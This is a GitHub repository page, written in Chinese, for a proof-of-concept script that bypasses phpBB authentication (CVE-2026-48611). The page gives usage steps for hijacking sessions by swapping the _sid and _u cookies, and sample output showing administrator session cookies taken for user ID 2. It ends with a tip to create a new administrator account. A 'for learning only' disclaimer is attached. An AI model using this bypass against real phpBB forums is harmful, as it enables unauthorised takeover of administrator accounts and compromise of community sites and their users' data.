wanmywan/CVE-2026-48611-phpBB

GitHub: wanmywan/CVE-2026-48611-phpBB

针对 phpBB 身份验证绕过漏洞(CVE-2026-48611)的概念验证脚本,可在受影响版本中获取会话并提权至管理员。

Stars: 0 | Forks: 0

# CVE-2026-48611-phpBB 绕过身份验证 简单的绕过身份验证 poc。如果你想通过浏览器访问,请不要忘记根据浏览器中显示的内容修改脚本中的 *USER_AGENT* 变量,这样才能生效。使用 cookie 编辑器替换 *_sid 和 *_u 的值 ## 受影响版本:phpBB 3.3.16 及以下版本 + 4.0.0-a2 ``` phpbb python3 exploit.py https://localhost:8000 joushk [+] Target: https://localhost:8000 [+] Target username: joushk [+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36 [+] Session cookies obtained: phpbb3_cl7ge_u: 2 phpbb3_cl7ge_k: phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3 [+] User ID: 2 [!] User ID is 2 – default admin account. [!] EXPLOIT SUCCESSFUL! [!] You now have admin access. [!] Note: ACP may still ask for password if re-authentication is enabled. [+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd ``` [!!!此脚本仅供学习目的]
标签:逆向工具